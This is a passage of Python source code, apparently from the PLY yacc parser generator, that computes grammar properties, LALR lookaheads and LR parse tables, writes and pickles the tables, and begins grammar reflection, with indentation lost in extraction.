mark_reachable_from( self.Productions[0].prod[0] )
return [s for s in list(self.Nonterminals)
if not reachable[s]]
# -----------------------------------------------------------------------------
# infinite_cycles()
#
# This function looks at the various parsing rules and tries to detect
# infinite recursion cycles (grammar rules where there is no possible way
# to derive a string of only terminals).
# -----------------------------------------------------------------------------
def infinite_cycles(self):
terminates = {}
# Terminals:
for t in self.Terminals:
terminates[t] = 1
terminates['$end'] = 1
# Nonterminals:
# Initialize to false:
for n in self.Nonterminals:
terminates[n] = 0
# Then propagate termination until no change:
while 1:
some_change = 0
for (n,pl) in self.Prodnames.items():
# Nonterminal n terminates iff any of its productions terminates.
for p in pl:
# Production p terminates iff all of its rhs symbols terminate.
for s in p.prod:
if not terminates[s]:
# The symbol s does not terminate,
# so production p does not terminate.
p_terminates = 0
break
else:
# didn't break from the loop,
# so every symbol s terminates
# so production p terminates.
p_terminates = 1
if p_terminates:
# symbol n terminates!
if not terminates[n]:
terminates[n] = 1
some_change = 1
# Don't need to consider any more productions for this n.
break
if not some_change:
break
infinite = []
for (s,term) in terminates.items():
if not term:
if not s in self.Prodnames and not s in self.Terminals and s != 'error':
# s is used-but-not-defined, and we've already warned of that,
# so it would be overkill to say that it's also non-terminating.
pass
else:
infinite.append(s)
return infinite
# -----------------------------------------------------------------------------
# undefined_symbols()
#
# Find all symbols that were used the grammar, but not defined as tokens or
# grammar rules. Returns a list of tuples (sym, prod) where sym in the symbol
# and prod is the production where the symbol was used.
# -----------------------------------------------------------------------------
def undefined_symbols(self):
result = []
for p in self.Productions:
if not p: continue
for s in p.prod:
if not s in self.Prodnames and not s in self.Terminals and s != 'error':
result.append((s,p))
return result
# -----------------------------------------------------------------------------
# unused_terminals()
#
# Find all terminals that were defined, but not used by the grammar. Returns
# a list of all symbols.
# -----------------------------------------------------------------------------
def unused_terminals(self):
unused_tok = []
for s,v in self.Terminals.items():
if s != 'error' and not v:
unused_tok.append(s)
return unused_tok
# ------------------------------------------------------------------------------
# unused_rules()
#
# Find all grammar rules that were defined, but not used (maybe not reachable)
# Returns a list of productions.
# ------------------------------------------------------------------------------
def unused_rules(self):
unused_prod = []
for s,v in self.Nonterminals.items():
if not v:
p = self.Prodnames[s][0]
unused_prod.append(p)
return unused_prod
# -----------------------------------------------------------------------------
# unused_precedence()
#
# Returns a list of tuples (term,precedence) corresponding to precedence
# rules that were never used by the grammar. term is the name of the terminal
# on which precedence was applied and precedence is a string such as 'left' or
# 'right' corresponding to the type of precedence.
# -----------------------------------------------------------------------------
def unused_precedence(self):
unused = []
for termname in self.Precedence:
if not (termname in self.Terminals or termname in self.UsedPrecedence):
unused.append((termname,self.Precedence[termname][0]))
return unused
# -------------------------------------------------------------------------
# _first()
#
# Compute the value of FIRST1(beta) where beta is a tuple of symbols.
#
# During execution of compute_first1, the result may be incomplete.
# Afterward (e.g., when called from compute_follow()), it will be complete.
# -------------------------------------------------------------------------
def _first(self,beta):
# We are computing First(x1,x2,x3,...,xn)
result = [ ]
for x in beta:
x_produces_empty = 0
# Add all the non-<empty> symbols of First[x] to the result.
for f in self.First[x]:
if f == '<empty>':
x_produces_empty = 1
else:
if f not in result: result.append(f)
if x_produces_empty:
# We have to consider the next x in beta,
# i.e. stay in the loop.
pass
else:
# We don't have to consider any further symbols in beta.
break
else:
# There was no 'break' from the loop,
# so x_produces_empty was true for all x in beta,
# so beta produces empty as well.
result.append('<empty>')
return result
# -------------------------------------------------------------------------
# compute_first()
#
# Compute the value of FIRST1(X) for all symbols
# -------------------------------------------------------------------------
def compute_first(self):
if self.First:
return self.First
# Terminals:
for t in self.Terminals:
self.First[t] = [t]
self.First['$end'] = ['$end']
# Nonterminals:
# Initialize to the empty set:
for n in self.Nonterminals:
self.First[n] = []
# Then propagate symbols until no change:
while 1:
some_change = 0
for n in self.Nonterminals:
for p in self.Prodnames[n]:
for f in self._first(p.prod):
if f not in self.First[n]:
self.First[n].append( f )
some_change = 1
if not some_change:
break
return self.First
# ---------------------------------------------------------------------
# compute_follow()
#
# Computes all of the follow sets for every non-terminal symbol. The
# follow set is the set of all symbols that might follow a given
# non-terminal. See the Dragon book, 2nd Ed. p. 189.
# ---------------------------------------------------------------------
def compute_follow(self,start=None):
# If already computed, return the result
if self.Follow:
return self.Follow
# If first sets not computed yet, do that first.
if not self.First:
self.compute_first()
# Add '$end' to the follow list of the start symbol
for k in self.Nonterminals:
self.Follow[k] = [ ]
if not start:
start = self.Productions[1].name
self.Follow[start] = [ '$end' ]
while 1:
didadd = 0
for p in self.Productions[1:]:
# Here is the production set
for i in range(len(p.prod)):
B = p.prod[i]
if B in self.Nonterminals:
# Okay. We got a non-terminal in a production
fst = self._first(p.prod[i+1:])
hasempty = 0
for f in fst:
if f != '<empty>' and f not in self.Follow[B]:
self.Follow[B].append(f)
didadd = 1
if f == '<empty>':
hasempty = 1
if hasempty or i == (len(p.prod)-1):
# Add elements of follow(a) to follow(b)
for f in self.Follow[p.name]:
if f not in self.Follow[B]:
self.Follow[B].append(f)
didadd = 1
if not didadd: break
return self.Follow
# -----------------------------------------------------------------------------
# build_lritems()
#
# This function walks the list of productions and builds a complete set of the
# LR items. The LR items are stored in two ways: First, they are uniquely
# numbered and placed in the list _lritems. Second, a linked list of LR items
# is built for each production. For example:
#
# E -> E PLUS E
#
# Creates the list
#
# [E -> . E PLUS E, E -> E . PLUS E, E -> E PLUS . E, E -> E PLUS E . ]
# -----------------------------------------------------------------------------
def build_lritems(self):
for p in self.Productions:
lastlri = p
i = 0
lr_items = []
while 1:
if i > len(p):
lri = None
else:
lri = LRItem(p,i)
# Precompute the list of productions immediately following
try:
lri.lr_after = self.Prodnames[lri.prod[i+1]]
except (IndexError,KeyError):
lri.lr_after = []
try:
lri.lr_before = lri.prod[i-1]
except IndexError:
lri.lr_before = None
lastlri.lr_next = lri
if not lri: break
lr_items.append(lri)
lastlri = lri
i += 1
p.lr_items = lr_items
# -----------------------------------------------------------------------------
# == Class LRTable ==
#
# This basic class represents a basic table of LR parsing information.
# Methods for generating the tables are not defined here. They are defined
# in the derived class LRGeneratedTable.
# -----------------------------------------------------------------------------
class VersionError(YaccError): pass
class LRTable(object):
def __init__(self):
self.lr_action = None
self.lr_goto = None
self.lr_productions = None
self.lr_method = None
def read_table(self,module):
if isinstance(module,types.ModuleType):
parsetab = module
else:
if sys.version_info[0] < 3:
exec("import %s as parsetab" % module)
else:
env = { }
exec("import %s as parsetab" % module, env, env)
parsetab = env['parsetab']
if parsetab._tabversion != __tabversion__:
raise VersionError("yacc table file version is out of date")
self.lr_action = parsetab._lr_action
self.lr_goto = parsetab._lr_goto
self.lr_productions = []
for p in parsetab._lr_productions:
self.lr_productions.append(MiniProduction(*p))
self.lr_method = parsetab._lr_method
return parsetab._lr_signature
def read_pickle(self,filename):
try:
import cPickle as pickle
except ImportError:
import pickle
in_f = open(filename,"rb")
tabversion = pickle.load(in_f)
if tabversion != __tabversion__:
raise VersionError("yacc table file version is out of date")
self.lr_method = pickle.load(in_f)
signature = pickle.load(in_f)
self.lr_action = pickle.load(in_f)
self.lr_goto = pickle.load(in_f)
productions = pickle.load(in_f)
self.lr_productions = []
for p in productions:
self.lr_productions.append(MiniProduction(*p))
in_f.close()
return signature
# Bind all production function names to callable objects in pdict
def bind_callables(self,pdict):
for p in self.lr_productions:
p.bind(pdict)
# -----------------------------------------------------------------------------
# === LR Generator ===
#
# The following classes and functions are used to generate LR parsing tables on
# a grammar.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# digraph()
# traverse()
#
# The following two functions are used to compute set valued functions
# of the form:
#
# F(x) = F'(x) U U{F(y) | x R y}
#
# This is used to compute the values of Read() sets as well as FOLLOW sets
# in LALR(1) generation.
#
# Inputs: X - An input set
# R - A relation
# FP - Set-valued function
# ------------------------------------------------------------------------------
def digraph(X,R,FP):
N = { }
for x in X:
N[x] = 0
stack = []
F = { }
for x in X:
if N[x] == 0: traverse(x,N,stack,F,X,R,FP)
return F
def traverse(x,N,stack,F,X,R,FP):
stack.append(x)
d = len(stack)
N[x] = d
F[x] = FP(x) # F(X) <- F'(x)
rel = R(x) # Get y's related to x
for y in rel:
if N[y] == 0:
traverse(y,N,stack,F,X,R,FP)
N[x] = min(N[x],N[y])
for a in F.get(y,[]):
if a not in F[x]: F[x].append(a)
if N[x] == d:
N[stack[-1]] = MAXINT
F[stack[-1]] = F[x]
element = stack.pop()
while element != x:
N[stack[-1]] = MAXINT
F[stack[-1]] = F[x]
element = stack.pop()
class LALRError(YaccError): pass
# -----------------------------------------------------------------------------
# == LRGeneratedTable ==
#
# This class implements the LR table generation algorithm. There are no
# public methods except for write()
# -----------------------------------------------------------------------------
class LRGeneratedTable(LRTable):
def __init__(self,grammar,method='LALR',log=None):
if method not in ['SLR','LALR']:
raise LALRError("Unsupported method %s" % method)
self.grammar = grammar
self.lr_method = method
# Set up the logger
if not log:
log = NullLogger()
self.log = log
# Internal attributes
self.lr_action = {} # Action table
self.lr_goto = {} # Goto table
self.lr_productions = grammar.Productions # Copy of grammar Production array
self.lr_goto_cache = {} # Cache of computed gotos
self.lr0_cidhash = {} # Cache of closures
self._add_count = 0 # Internal counter used to detect cycles
# Diagonistic information filled in by the table generator
self.sr_conflict = 0
self.rr_conflict = 0
self.conflicts = [] # List of conflicts
self.sr_conflicts = []
self.rr_conflicts = []
# Build the tables
self.grammar.build_lritems()
self.grammar.compute_first()
self.grammar.compute_follow()
self.lr_parse_table()
# Compute the LR(0) closure operation on I, where I is a set of LR(0) items.
def lr0_closure(self,I):
self._add_count += 1
# Add everything in I to J
J = I[:]
didadd = 1
while didadd:
didadd = 0
for j in J:
for x in j.lr_after:
if getattr(x,"lr0_added",0) == self._add_count: continue
# Add B --> .G to J
J.append(x.lr_next)
x.lr0_added = self._add_count
didadd = 1
return J
# Compute the LR(0) goto function goto(I,X) where I is a set
# of LR(0) items and X is a grammar symbol. This function is written
# in a way that guarantees uniqueness of the generated goto sets
# (i.e. the same goto set will never be returned as two different Python
# objects). With uniqueness, we can later do fast set comparisons using
# id(obj) instead of element-wise comparison.
def lr0_goto(self,I,x):
# First we look for a previously cached entry
g = self.lr_goto_cache.get((id(I),x),None)
if g: return g
# Now we generate the goto set in a way that guarantees uniqueness
# of the result
s = self.lr_goto_cache.get(x,None)
if not s:
s = { }
self.lr_goto_cache[x] = s
gs = [ ]
for p in I:
n = p.lr_next
if n and n.lr_before == x:
s1 = s.get(id(n),None)
if not s1:
s1 = { }
s[id(n)] = s1
gs.append(n)
s = s1
g = s.get('$end',None)
if not g:
if gs:
g = self.lr0_closure(gs)
s['$end'] = g
else:
s['$end'] = gs
self.lr_goto_cache[(id(I),x)] = g
return g
# Compute the LR(0) sets of item function
def lr0_items(self):
C = [ self.lr0_closure([self.grammar.Productions[0].lr_next]) ]
i = 0
for I in C:
self.lr0_cidhash[id(I)] = i
i += 1
# Loop over the items in C and each grammar symbols
i = 0
while i < len(C):
I = C[i]
i += 1
# Collect all of the symbols that could possibly be in the goto(I,X) sets
asyms = { }
for ii in I:
for s in ii.usyms:
asyms[s] = None
for x in asyms:
g = self.lr0_goto(I,x)
if not g: continue
if id(g) in self.lr0_cidhash: continue
self.lr0_cidhash[id(g)] = len(C)
C.append(g)
return C
# -----------------------------------------------------------------------------
# ==== LALR(1) Parsing ====
#
# LALR(1) parsing is almost exactly the same as SLR except that instead of
# relying upon Follow() sets when performing reductions, a more selective
# lookahead set that incorporates the state of the LR(0) machine is utilized.
# Thus, we mainly just have to focus on calculating the lookahead sets.
#
# The method used here is due to DeRemer and Pennelo (1982).
#
# DeRemer, F. L., and T. J. Pennelo: "Efficient Computation of LALR(1)
# Lookahead Sets", ACM Transactions on Programming Languages and Systems,
# Vol. 4, No. 4, Oct. 1982, pp. 615-649
#
# Further details can also be found in:
#
# J. Tremblay and P. Sorenson, "The Theory and Practice of Compiler Writing",
# McGraw-Hill Book Company, (1985).
#
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# compute_nullable_nonterminals()
#
# Creates a dictionary containing all of the non-terminals that might produce
# an empty production.
# -----------------------------------------------------------------------------
def compute_nullable_nonterminals(self):
nullable = {}
num_nullable = 0
while 1:
for p in self.grammar.Productions[1:]:
if p.len == 0:
nullable[p.name] = 1
continue
for t in p.prod:
if not t in nullable: break
else:
nullable[p.name] = 1
if len(nullable) == num_nullable: break
num_nullable = len(nullable)
return nullable
# -----------------------------------------------------------------------------
# find_nonterminal_trans(C)
#
# Given a set of LR(0) items, this functions finds all of the non-terminal
# transitions. These are transitions in which a dot appears immediately before
# a non-terminal. Returns a list of tuples of the form (state,N) where state
# is the state number and N is the nonterminal symbol.
#
# The input C is the set of LR(0) items.
# -----------------------------------------------------------------------------
def find_nonterminal_transitions(self,C):
trans = []
for state in range(len(C)):
for p in C[state]:
if p.lr_index < p.len - 1:
t = (state,p.prod[p.lr_index+1])
if t[1] in self.grammar.Nonterminals:
if t not in trans: trans.append(t)
state = state + 1
return trans
# -----------------------------------------------------------------------------
# dr_relation()
#
# Computes the DR(p,A) relationships for non-terminal transitions. The input
# is a tuple (state,N) where state is a number and N is a nonterminal symbol.
#
# Returns a list of terminals.
# -----------------------------------------------------------------------------
def dr_relation(self,C,trans,nullable):
dr_set = { }
state,N = trans
terms = []
g = self.lr0_goto(C[state],N)
for p in g:
if p.lr_index < p.len - 1:
a = p.prod[p.lr_index+1]
if a in self.grammar.Terminals:
if a not in terms: terms.append(a)
# This extra bit is to handle the start state
if state == 0 and N == self.grammar.Productions[0].prod[0]:
terms.append('$end')
return terms
# -----------------------------------------------------------------------------
# reads_relation()
#
# Computes the READS() relation (p,A) READS (t,C).
# -----------------------------------------------------------------------------
def reads_relation(self,C, trans, empty):
# Look for empty transitions
rel = []
state, N = trans
g = self.lr0_goto(C[state],N)
j = self.lr0_cidhash.get(id(g),-1)
for p in g:
if p.lr_index < p.len - 1:
a = p.prod[p.lr_index + 1]
if a in empty:
rel.append((j,a))
return rel
# -----------------------------------------------------------------------------
# compute_lookback_includes()
#
# Determines the lookback and includes relations
#
# LOOKBACK:
#
# This relation is determined by running the LR(0) state machine forward.
# For example, starting with a production "N : . A B C", we run it forward
# to obtain "N : A B C ." We then build a relationship between this final
# state and the starting state. These relationships are stored in a dictionary
# lookdict.
#
# INCLUDES:
#
# Computes the INCLUDE() relation (p,A) INCLUDES (p',B).
#
# This relation is used to determine non-terminal transitions that occur
# inside of other non-terminal transition states. (p,A) INCLUDES (p', B)
# if the following holds:
#
# B -> LAT, where T -> epsilon and p' -L-> p
#
# L is essentially a prefix (which may be empty), T is a suffix that must be
# able to derive an empty string. State p' must lead to state p with the string L.
#
# -----------------------------------------------------------------------------
def compute_lookback_includes(self,C,trans,nullable):
lookdict = {} # Dictionary of lookback relations
includedict = {} # Dictionary of include relations
# Make a dictionary of non-terminal transitions
dtrans = {}
for t in trans:
dtrans[t] = 1
# Loop over all transitions and compute lookbacks and includes
for state,N in trans:
lookb = []
includes = []
for p in C[state]:
if p.name != N: continue
# Okay, we have a name match. We now follow the production all the way
# through the state machine until we get the . on the right hand side
lr_index = p.lr_index
j = state
while lr_index < p.len - 1:
lr_index = lr_index + 1
t = p.prod[lr_index]
# Check to see if this symbol and state are a non-terminal transition
if (j,t) in dtrans:
# Yes. Okay, there is some chance that this is an includes relation
# the only way to know for certain is whether the rest of the
# production derives empty
li = lr_index + 1
while li < p.len:
if p.prod[li] in self.grammar.Terminals: break # No forget it
if not p.prod[li] in nullable: break
li = li + 1
else:
# Appears to be a relation between (j,t) and (state,N)
includes.append((j,t))
g = self.lr0_goto(C[j],t) # Go to next set
j = self.lr0_cidhash.get(id(g),-1) # Go to next state
# When we get here, j is the final state, now we have to locate the production
for r in C[j]:
if r.name != p.name: continue
if r.len != p.len: continue
i = 0
# This look is comparing a production ". A B C" with "A B C ."
while i < r.lr_index:
if r.prod[i] != p.prod[i+1]: break
i = i + 1
else:
lookb.append((j,r))
for i in includes:
if not i in includedict: includedict[i] = []
includedict[i].append((state,N))
lookdict[(state,N)] = lookb
return lookdict,includedict
# -----------------------------------------------------------------------------
# compute_read_sets()
#
# Given a set of LR(0) items, this function computes the read sets.
#
# Inputs: C = Set of LR(0) items
# ntrans = Set of nonterminal transitions
# nullable = Set of empty transitions
#
# Returns a set containing the read sets
# -----------------------------------------------------------------------------
def compute_read_sets(self,C, ntrans, nullable):
FP = lambda x: self.dr_relation(C,x,nullable)
R = lambda x: self.reads_relation(C,x,nullable)
F = digraph(ntrans,R,FP)
return F
# -----------------------------------------------------------------------------
# compute_follow_sets()
#
# Given a set of LR(0) items, a set of non-terminal transitions, a readset,
# and an include set, this function computes the follow sets
#
# Follow(p,A) = Read(p,A) U U {Follow(p',B) | (p,A) INCLUDES (p',B)}
#
# Inputs:
# ntrans = Set of nonterminal transitions
# readsets = Readset (previously computed)
# inclsets = Include sets (previously computed)
#
# Returns a set containing the follow sets
# -----------------------------------------------------------------------------
def compute_follow_sets(self,ntrans,readsets,inclsets):
FP = lambda x: readsets[x]
R = lambda x: inclsets.get(x,[])
F = digraph(ntrans,R,FP)
return F
# -----------------------------------------------------------------------------
# add_lookaheads()
#
# Attaches the lookahead symbols to grammar rules.
#
# Inputs: lookbacks - Set of lookback relations
# followset - Computed follow set
#
# This function directly attaches the lookaheads to productions contained
# in the lookbacks set
# -----------------------------------------------------------------------------
def add_lookaheads(self,lookbacks,followset):
for trans,lb in lookbacks.items():
# Loop over productions in lookback
for state,p in lb:
if not state in p.lookaheads:
p.lookaheads[state] = []
f = followset.get(trans,[])
for a in f:
if a not in p.lookaheads[state]: p.lookaheads[state].append(a)
# -----------------------------------------------------------------------------
# add_lalr_lookaheads()
#
# This function does all of the work of adding lookahead information for use
# with LALR parsing
# -----------------------------------------------------------------------------
def add_lalr_lookaheads(self,C):
# Determine all of the nullable nonterminals
nullable = self.compute_nullable_nonterminals()
# Find all non-terminal transitions
trans = self.find_nonterminal_transitions(C)
# Compute read sets
readsets = self.compute_read_sets(C,trans,nullable)
# Compute lookback/includes relations
lookd, included = self.compute_lookback_includes(C,trans,nullable)
# Compute LALR FOLLOW sets
followsets = self.compute_follow_sets(trans,readsets,included)
# Add all of the lookaheads
self.add_lookaheads(lookd,followsets)
# -----------------------------------------------------------------------------
# lr_parse_table()
#
# This function constructs the parse tables for SLR or LALR
# -----------------------------------------------------------------------------
def lr_parse_table(self):
Productions = self.grammar.Productions
Precedence = self.grammar.Precedence
goto = self.lr_goto # Goto array
action = self.lr_action # Action array
log = self.log # Logger for output
actionp = { } # Action production array (temporary)
log.info("Parsing method: %s", self.lr_method)
# Step 1: Construct C = { I0, I1, ... IN}, collection of LR(0) items
# This determines the number of states
C = self.lr0_items()
if self.lr_method == 'LALR':
self.add_lalr_lookaheads(C)
# Build the parser table, state by state
st = 0
for I in C:
# Loop over each production in I
actlist = [ ] # List of actions
st_action = { }
st_actionp = { }
st_goto = { }
log.info("")
log.info("state %d", st)
log.info("")
for p in I:
log.info(" (%d) %s", p.number, str(p))
log.info("")
for p in I:
if p.len == p.lr_index + 1:
if p.name == "S'":
# Start symbol. Accept!
st_action["$end"] = 0
st_actionp["$end"] = p
else:
# We are at the end of a production. Reduce!
if self.lr_method == 'LALR':
laheads = p.lookaheads[st]
else:
laheads = self.grammar.Follow[p.name]
for a in laheads:
actlist.append((a,p,"reduce using rule %d (%s)" % (p.number,p)))
r = st_action.get(a,None)
if r is not None:
# Whoa. Have a shift/reduce or reduce/reduce conflict
if r > 0:
# Need to decide on shift or reduce here
# By default we favor shifting. Need to add
# some precedence rules here.
sprec,slevel = Productions[st_actionp[a].number].prec
rprec,rlevel = Precedence.get(a,('right',0))
if (slevel < rlevel) or ((slevel == rlevel) and (rprec == 'left')):
# We really need to reduce here.
st_action[a] = -p.number
st_actionp[a] = p
if not slevel and not rlevel:
log.info(" ! shift/reduce conflict for %s resolved as reduce",a)
self.sr_conflicts.append((st,a,'reduce'))
Productions[p.number].reduced += 1
elif (slevel == rlevel) and (rprec == 'nonassoc'):
st_action[a] = None
else:
# Hmmm. Guess we'll keep the shift
if not rlevel:
log.info(" ! shift/reduce conflict for %s resolved as shift",a)
self.sr_conflicts.append((st,a,'shift'))
elif r < 0:
# Reduce/reduce conflict. In this case, we favor the rule
# that was defined first in the grammar file
oldp = Productions[-r]
pp = Productions[p.number]
if oldp.line > pp.line:
st_action[a] = -p.number
st_actionp[a] = p
chosenp,rejectp = pp,oldp
Productions[p.number].reduced += 1
Productions[oldp.number].reduced -= 1
else:
chosenp,rejectp = oldp,pp
self.rr_conflicts.append((st,chosenp,rejectp))
log.info(" ! reduce/reduce conflict for %s resolved using rule %d (%s)", a,st_actionp[a].number, st_actionp[a])
else:
raise LALRError("Unknown conflict in state %d" % st)
else:
st_action[a] = -p.number
st_actionp[a] = p
Productions[p.number].reduced += 1
else:
i = p.lr_index
a = p.prod[i+1] # Get symbol right after the "."
if a in self.grammar.Terminals:
g = self.lr0_goto(I,a)
j = self.lr0_cidhash.get(id(g),-1)
if j >= 0:
# We are in a shift state
actlist.append((a,p,"shift and go to state %d" % j))
r = st_action.get(a,None)
if r is not None:
# Whoa have a shift/reduce or shift/shift conflict
if r > 0:
if r != j:
raise LALRError("Shift/shift conflict in state %d" % st)
elif r < 0:
# Do a precedence check.
# - if precedence of reduce rule is higher, we reduce.
# - if precedence of reduce is same and left assoc, we reduce.
# - otherwise we shift
rprec,rlevel = Productions[st_actionp[a].number].prec
sprec,slevel = Precedence.get(a,('right',0))
if (slevel > rlevel) or ((slevel == rlevel) and (rprec == 'right')):
# We decide to shift here... highest precedence to shift
Productions[st_actionp[a].number].reduced -= 1
st_action[a] = j
st_actionp[a] = p
if not rlevel:
log.info(" ! shift/reduce conflict for %s resolved as shift",a)
self.sr_conflicts.append((st,a,'shift'))
elif (slevel == rlevel) and (rprec == 'nonassoc'):
st_action[a] = None
else:
# Hmmm. Guess we'll keep the reduce
if not slevel and not rlevel:
log.info(" ! shift/reduce conflict for %s resolved as reduce",a)
self.sr_conflicts.append((st,a,'reduce'))
else:
raise LALRError("Unknown conflict in state %d" % st)
else:
st_action[a] = j
st_actionp[a] = p
# Print the actions associated with each terminal
_actprint = { }
for a,p,m in actlist:
if a in st_action:
if p is st_actionp[a]:
log.info(" %-15s %s",a,m)
_actprint[(a,m)] = 1
log.info("")
# Print the actions that were not used. (debugging)
not_used = 0
for a,p,m in actlist:
if a in st_action:
if p is not st_actionp[a]:
if not (a,m) in _actprint:
log.debug(" ! %-15s [ %s ]",a,m)
not_used = 1
_actprint[(a,m)] = 1
if not_used:
log.debug("")
# Construct the goto table for this state
nkeys = { }
for ii in I:
for s in ii.usyms:
if s in self.grammar.Nonterminals:
nkeys[s] = None
for n in nkeys:
g = self.lr0_goto(I,n)
j = self.lr0_cidhash.get(id(g),-1)
if j >= 0:
st_goto[n] = j
log.info(" %-30s shift and go to state %d",n,j)
action[st] = st_action
actionp[st] = st_actionp
goto[st] = st_goto
st += 1
# -----------------------------------------------------------------------------
# write()
#
# This function writes the LR parsing tables to a file
# -----------------------------------------------------------------------------
def write_table(self,modulename,outputdir='',signature=""):
basemodulename = modulename.split(".")[-1]
filename = os.path.join(outputdir,basemodulename) + ".py"
try:
f = open(filename,"w")
f.write("""
# %s
# This file is automatically generated. Do not edit.
_tabversion = %r
_lr_method = %r
_lr_signature = %r
""" % (filename, __tabversion__, self.lr_method, signature))
# Change smaller to 0 to go back to original tables
smaller = 1
# Factor out names to try and make smaller
if smaller:
items = { }
for s,nd in self.lr_action.items():
for name,v in nd.items():
i = items.get(name)
if not i:
i = ([],[])
items[name] = i
i[0].append(s)
i[1].append(v)
f.write("\n_lr_action_items = {")
for k,v in items.items():
f.write("%r:([" % k)
for i in v[0]:
f.write("%r," % i)
f.write("],[")
for i in v[1]:
f.write("%r," % i)
f.write("]),")
f.write("}\n")
f.write("""
_lr_action = { }
for _k, _v in _lr_action_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_action: _lr_action[_x] = { }
_lr_action[_x][_k] = _y
del _lr_action_items
""")
else:
f.write("\n_lr_action = { ");
for k,v in self.lr_action.items():
f.write("(%r,%r):%r," % (k[0],k[1],v))
f.write("}\n");
if smaller:
# Factor out names to try and make smaller
items = { }
for s,nd in self.lr_goto.items():
for name,v in nd.items():
i = items.get(name)
if not i:
i = ([],[])
items[name] = i
i[0].append(s)
i[1].append(v)
f.write("\n_lr_goto_items = {")
for k,v in items.items():
f.write("%r:([" % k)
for i in v[0]:
f.write("%r," % i)
f.write("],[")
for i in v[1]:
f.write("%r," % i)
f.write("]),")
f.write("}\n")
f.write("""
_lr_goto = { }
for _k, _v in _lr_goto_items.items():
for _x,_y in zip(_v[0],_v[1]):
if not _x in _lr_goto: _lr_goto[_x] = { }
_lr_goto[_x][_k] = _y
del _lr_goto_items
""")
else:
f.write("\n_lr_goto = { ");
for k,v in self.lr_goto.items():
f.write("(%r,%r):%r," % (k[0],k[1],v))
f.write("}\n");
# Write production table
f.write("_lr_productions = [\n")
for p in self.lr_productions:
if p.func:
f.write(" (%r,%r,%d,%r,%r,%d),\n" % (p.str,p.name, p.len, p.func,p.file,p.line))
else:
f.write(" (%r,%r,%d,None,None,None),\n" % (str(p),p.name, p.len))
f.write("]\n")
f.close()
except IOError:
e = sys.exc_info()[1]
sys.stderr.write("Unable to create '%s'\n" % filename)
sys.stderr.write(str(e)+"\n")
return
# -----------------------------------------------------------------------------
# pickle_table()
#
# This function pickles the LR parsing tables to a supplied file object
# -----------------------------------------------------------------------------
def pickle_table(self,filename,signature=""):
try:
import cPickle as pickle
except ImportError:
import pickle
outf = open(filename,"wb")
pickle.dump(__tabversion__,outf,pickle_protocol)
pickle.dump(self.lr_method,outf,pickle_protocol)
pickle.dump(signature,outf,pickle_protocol)
pickle.dump(self.lr_action,outf,pickle_protocol)
pickle.dump(self.lr_goto,outf,pickle_protocol)
outp = []
for p in self.lr_productions:
if p.func:
outp.append((p.str,p.name, p.len, p.func,p.file,p.line))
else:
outp.append((str(p),p.name,p.len,None,None,None))
pickle.dump(outp,outf,pickle_protocol)
outf.close()
# -----------------------------------------------------------------------------
# === INTROSPECTION ===
#
# The following functions and classes are used to implement the PLY
# introspection features followed by the yacc() function itself.
# -----------------------------------------------------------------------------
# -----------------------------------------------------------------------------
# get_caller_module_dict()
#
# This function returns a dictionary containing all of the symbols defined within
# a caller further down the call stack. This is used to get the environment
# associated with the yacc() call if none was provided.
# -----------------------------------------------------------------------------
def get_caller_module_dict(levels):
try:
raise RuntimeError
except RuntimeError:
e,b,t = sys.exc_info()
f = t.tb_frame
while levels > 0:
f = f.f_back
levels -= 1
ldict = f.f_globals.copy()
if f.f_globals != f.f_locals:
ldict.update(f.f_locals)
return ldict
# -----------------------------------------------------------------------------
# parse_grammar()
#
# This takes a raw grammar rule string and parses it into production data
# -----------------------------------------------------------------------------
def parse_grammar(doc,file,line):
grammar = []
# Split the doc string into lines
pstrings = doc.splitlines()
lastp = None
dline = line
for ps in pstrings:
dline += 1
p = ps.split()
if not p: continue
try:
if p[0] == '|':
# This is a continuation of a previous rule
if not lastp:
raise SyntaxError("%s:%d: Misplaced '|'" % (file,dline))
prodname = lastp
syms = p[1:]
else:
prodname = p[0]
lastp = prodname
syms = p[2:]
assign = p[1]
if assign != ':' and assign != '::=':
raise SyntaxError("%s:%d: Syntax error. Expected ':'" % (file,dline))
grammar.append((file,dline,prodname,syms))
except SyntaxError:
raise
except Exception:
raise SyntaxError("%s:%d: Syntax error in rule '%s'" % (file,dline,ps.strip()))
return grammar
# -----------------------------------------------------------------------------
# ParserReflect()
#
# This class represents information extracted for building a parser including
# start symbol, error function, tokens, precedence list, action functions,
# etc.
# -----------------------------------------------------------------------------
class ParserReflect(object):
def __init__(self,pdict,log=None):
self.pdict = pdict
self.start = None
self.error_func = None
self.tokens = None
self.files = {}
self.grammar = []
self.error = 0
if log is None:
self.log = PlyLogger(sys.stderr)
else:
self.log = log
# Get all of the basic information
def get_all(self):
self.get_start()
self.get_error_func()
self.get_tokens()
self.get_precedence()
self.get_pfunctions()
# Validate all of the information
def validate_all(self):
self.validate_start()
self.validate_error_func()
self.validate_tokens()
self.validate_precedence()
self.validate_pfunctions()
self.validate_files()
return self.error
# Compute a signature over the grammar
def signature(self):
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
sig = md5()
if self.start:
sig.update(self.start.encode('latin-1'))
if self.prec:
sig.update("".join(["".join(p) for p in self.prec]).encode('latin-1'))
if self.tokens:
sig.update(" ".join(self.tokens).encode('latin-1'))
for f in self.pfuncs:
if f[3]:
sig.update(f[3].encode('latin-1'))
except (TypeError,ValueError):
pass
return sig.digest()
# -----------------------------------------------------------------------------
# validate_file()
#
# This method checks to see if there are duplicated p_rulename() functions
# in the parser module file. Without this function, it is really easy for
# users to make mistakes by cutting and pasting code fragments (and it's a real
# bugger to try and figure out why the resulting parser doesn't work). Therefore,
# we just do a little regular expression pattern matching of def statements
# to try and detect duplicates.
# -----------------------------------------------------------------------------
def validate_files(self):
# Match def p_funcname(
fre = re.compile(r'\s*def\s+(p_[a-zA-Z_0-9]*)\(')
for filename in self.files.keys():
base,ext = os.path.splitext(filename)
if ext != '.py': return 1 # No idea. Assume it's okay.
try:
f = open(filename)
lines = f.readlines()
f.close()
except IOError:
continue
counthash = { }
for linen,l in enumerate(lines):
linen += 1
m = fre.match(l)
if m:
name = m.group(1)
prev = counthash.get(name)
if not prev:
counthash[name] = linen
else:
self.log.warning("%s:%d: Function %s redefined. Previously defined on line %d", filename,linen,name,prev)
# Get the start symbol
def get_start(self):
self.start = self.pdict.get('start')
# Validate the start symbol
def validate_start(self):
if self.start is not None:
if not isinstance(self.start,str):
